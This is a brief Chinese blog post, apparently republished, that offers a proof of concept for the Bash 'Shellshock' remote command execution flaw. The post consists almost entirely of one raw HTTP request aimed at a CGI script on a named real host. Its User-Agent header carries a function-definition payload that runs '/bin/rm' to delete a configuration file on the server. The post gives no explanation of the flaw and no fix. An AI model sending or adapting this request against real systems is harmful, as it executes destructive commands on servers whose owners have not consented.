Bash远程解析命令执行漏洞测试方法

发布时间:2020-06-14 06:16:52 作者:zhpfxl
来源:网络 阅读:580

漏洞利用POC:

GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1

Host: help.tenpay.com 

User-Agent: () { :;}; /bin/rm ./conf/test.xml

Accept: */*

Connection: keep-alive



附件:http://down.51cto.com/data/2368439
推荐阅读:
  1. Apache SSI 远程命令执行漏洞
  2. ThinkPHP远程命令执行漏洞原理及复现

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

漏洞 bash 命令执行漏洞

上一篇:Bootstrap动态编程

下一篇:使用flume替代原有的scribe服务

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》